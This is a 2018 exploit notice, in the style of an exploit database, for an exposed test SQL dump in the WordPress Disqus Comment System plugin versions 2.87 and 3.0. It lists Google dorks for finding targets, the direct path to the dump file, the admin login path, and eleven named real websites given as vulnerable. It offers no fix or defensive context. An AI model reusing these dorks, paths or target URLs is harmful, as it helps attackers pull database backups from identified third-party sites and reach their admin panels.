#################################################################################################
# Exploit Title : WordPress Disqus Comment System Plugins 2.87 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : disqus.com ~ wordpress.org/plugins/disqus-comment-system/
# Software Download Link : github.com/clearhead/clearhead.me/archive/master.zip
+ github.com/clearhead/clearhead.me/blob/master/wp-content/plugins/disqus-comment-system/tests/initial.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.87 and 3.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/disqus-comment-system/tests/''
intext:''Greyzed Theme created by The Forge Web Creations. Powered by WordPress.''
intext:''© 2008 - 2018 Grazitti Interactive. All rights reserved''
intext:''HyTrade Marketing & Comunicação © 2017 | Todos direitos reservados''
intext:''© 2018 Chainbit, LLC. All rights reserved''
intext:''Copyright 2015 / CIP Data Collection Ltd Company No. 10462735''
intext:''© 2017 Longlife Magazine - All Rights Reserved.''
intext:''© Copyright Feira Cultural 2017. Todos os direitos reservado''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
-- MySQL dump 10.13 Distrib 5.1.48, for apple-darwin10.4.0 (i386)
--
-- Host: localhost Database: wordpress
-- ------------------------------------------------------
-- Server version 5.1.48
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] therussianlinesman.com/blog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] hytrade.com.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] grazitti.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] paulsforza.com/wordpress/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] combbo.com.br/cmb/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] uof7.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] ecommerceandb2b.com/b2bblog/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] cipmetering.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] soogran.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] longlifemagz.com/wp-content/plugins/disqus-comment-system/tests/initial.sql
[+] feiracultural.art.br/wp-content/plugins/disqus-comment-system/tests/initial.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################